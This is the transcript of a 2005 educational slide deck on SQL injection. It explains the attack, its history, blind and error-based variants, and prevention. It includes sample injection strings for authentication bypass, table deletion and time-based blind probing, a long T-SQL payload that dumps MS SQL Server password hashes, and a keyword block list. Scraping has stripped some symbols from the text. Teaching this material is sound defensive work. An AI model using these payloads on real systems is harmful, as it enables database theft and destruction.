SQL Injection Attacks - PowerPoint PPT Presentation

1 / 19
About This Presentation
Title:

SQL Injection Attacks

Description:

All product names will be returned. Data leak. 6. What is SQL Injection? ... First mention by rain forest puppy in Phrack 54, December 1998. ... – PowerPoint PPT presentation

Number of Views:333
Avg rating:3.0/5.0
Slides: 20
Provided by: andreyra
Category:
Tags: sql | attacks | injection

less

Transcript and Presenter's Notes

Title: SQL Injection Attacks


1
SQL Injection Attacks
  • Andrey Rakowitsch
  • November 18th 2005

2
First What is SQL?
  • Structured Query Language interface to
    relational database systems.
  • Allows for insert, update, delete, and retrieval
    of data in a database.
  • ANSI, ISO Standard, used extensively in web
    applications.
  • Example
  • select ProductName from products where ProductID
    40

3
How is it normally used in websites?
  • Take user input from a web form and pass it to a
    server-side script via HTTP methods such as POST
    or GET.
  • Process request, open connection to database.
  • Query database and retrieve results.
  • Send processed results back to user.

Web server
Application server
Database server
4
PHP example
  • name HTTP_POST_VARS"name"
  • query select from restaurants where name
    .name.
  • result mysql_query(query)

5
What is SQL Injection?
  • The ability to inject SQL commands into the
    database engine through existing application.
  • For example, if user input is 23 or 1 1
  • select ProductName from products where ProductID
    23 or 1 1
  • All product names will be returned. Data leak.

6
What is SQL Injection?
  • Flaw in web application not in database or web
    server.
  • No matter how patched your system is, no matter
    how many ports you close, an attacker can get
    complete ownership of your database.
  • NMap or Nessus will not help you against sloppy
    code.
  • In essence client supplied data without
    validation.

7
Brief History of SQL Injection
  • First mention by rain forest puppy in Phrack 54,
    December 1998.
  • In February 2000 rfp publishes How I hacked
    Packetstorm A look at hacking wwwthreads via
    SQL.
  • January 2002 Chris Anley published Advanced SQL
    Injection in SQL Server Applications. First in
    depth paper.
  • At Blackhat 2004, 0x90.org release SQeaL
    (predecessor to Absinthe).

8
What can SQL Injection do?
  • Delete
  • Select productinfo from table where productname
    whatever DROP TABLE productinfo --
  • Bypass Authentication
  • Select from users where usernameuser and
    passwordpasswd
  • select from users where usernameadmin-- and
    passwordwhocares

9
Not always that simple
  • Grabbing MS SQL Server Hashes
  • ' begin declare _at_var varchar(8000), _at_xdate1
    datetime, _at_binvalue varbinary(255), _at_charvalue
    varchar(255), _at_i int, _at_length int, _at_hexstring
    char(16) set _at_var'' select _at_xdate1(select
    min(xdate1) from master.dbo.sysxlogins where
    password is not null) begin while _at_xdate1 lt
    (select max(xdate1) from master.dbo.sysxlogins
    where password is not null) begin select
    _at_binvalue(select password from
    master.dbo.sysxlogins where xdate1_at_xdate1),
    _at_charvalue '0x', _at_i1, _at_lengthdatalength(_at_binva
    lue), _at_hexstring '0123456789ABCDEF' while
    (_at_ilt_at_length) begin declare _at_tempint int,
    _at_firstint int, _at_secondint int select
    _at_tempintCONVERT(int, SUBSTRING(_at_binvalue,_at_i,1))
    select _at_firstintFLOOR(_at_tempint/16) select
    _at_secondint_at_tempint - (_at_firstint16) select
    _at_charvalue_at_charvalue SUBSTRING
    (_at_hexstring,_at_firstint1,1) SUBSTRING
    (_at_hexstring, _at_secondint1, 1) select _at_i_at_i1
    end select _at_var_at_var' 'name'/'_at_charvalue
    from master.dbo.sysxlogins where xdate1_at_xdate1
    select _at_xdate1 (select isnull(min(xdate1),getdat
    e()) from master..sysxlogins where xdate1gt_at_xdate1
    and password is not null) end select _at_var as x
    into temp end end --

10
Possibilities are endless
  • Some examples
  • Brute forcing passwords using attacked server to
    do the processing.
  • Interact with OS, reading and writing files.
  • Gather IP information through reverse lookup.
  • Start FTP service on attacked server.
  • Retrieve VNC passwords from registry.
  • File uploading.

11
Error Based SQL Injection
  • select from table where id convert(int,SYSTEM_
    USER)
  • Output
  • MicrosoftODBC SQL Server DriverSQLServerS
    yntax error converting the nvarchar value sa to
    a column of data type int.
  • Error based SQL injection used solely on
    Microsoft SQL Servers

12
Blind SQL Injection
  • When no explicit error information is available
    to the attacker.
  • Make use of boolean values to ask the database
    yes or no questions then interpret HTML results
    for TRUE and FALSE signatures.
  • Much slower In the worst case scenario, it takes
    7 yes or no questions to find the first character
    of a username using binary search.
  • That is why automated tools exist.

13
Blind SQL Injection (example)
  • Base Cases
  • eng.usf.edu/results.jsp?id4 and 1 1 (always
    true)
  • eng.usf.edu/results.jsp?id4 and 1 0 (always
    false)
  • Is the 8th character of the username greater than
    ASCII value 82?
  • Extract data a character at a time.

14
How to recognize T and F signatures?
  • Several Solutions
  • Keyword search
  • MD5 Sum
  • Text Difference Engine
  • HTML Parse Tree
  • Linear representation of ASCII sums
  • Tolerance Band Comparison with subtractive filter
  • Adaptive filter

15
Blind SQL Injection
  • NOTE Even when boolean HTML signatures are not
    available, an attacker can use if statements to
    get a yes or no response. Examples
  • ' if condition waitfor delay '005'
  • ' union select if( condition , benchmark
    (100000, sha1('test')), 'false' ),1,1,1,1

16
Prevention
  • Check and filter user input.
  • Length limit on input (most attacks depend on
    long query strings).
  • Different types of inputs have a specific
    language and syntax associated with them, i.e.
    name, email, etc
  • Do not allow suspicious keywords (DROP, INSERT,
    SELECT, SHUTDOWN) as name for example.
  • Try to bind variables to specific types.

17
Prevention
  • Call stored procedures, instead of directly
    sending SQL statements to the database.
  • Good in order to bind variables.
  • Has some overhead associated with it
  • Harder to code, not as flexible.

18
Prevention
  • Principal of Least Privilege
  • A user or process should have the lowest level of
    privilege required in order to perform his
    assigned task.
  • If you know a specific user will only read from
    the database, do not grant him root privileges.
  • Segregate users. Define roles.

19
Prevention
  • Configure error reporting
  • Never expose any information to the user.
  • Intrusion Detection System
  • It is possible to get signatures of SQL Injection
    (especially blind) attacks.
  • Log DoS like behavior.
  • Warning illegal use of this application has
    been detected. Legal actions will be taken..
  • Random seed generation to mess up True and False
    signatures.
Write a Comment
User Comments (0)
About PowerShow.com